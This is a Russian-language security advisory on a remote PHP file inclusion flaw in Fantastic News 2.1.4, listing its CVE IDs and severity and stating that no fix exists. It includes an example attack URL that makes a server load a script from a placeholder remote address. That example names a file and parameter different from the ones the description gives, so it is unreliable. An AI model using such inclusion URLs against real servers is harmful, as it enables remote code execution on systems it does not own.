PHP-инклюдинг в Fantastic News

Дата публикации:
09.09.2006
Дата изменения:
17.10.2006
Всего просмотров:
1893
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2006-4671
CVE-2006-6542
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
Неавторизованное изменение данных
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Fantastic News 2.x
Уязвимые версии: Fantastic News 2.1.4, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "CONFIG[script_path]" в сценариях archive.php и headlines.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://example/[ac_path]/spaw/spaw_control.class.php?spaw_root=[cmd_url]/

URL производителя: fscripts.com/free.php?id=1

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: Fantastic News "CONFIG[script_path]" File Inclusion Vulnerabilities

или введите имя

CAPTCHA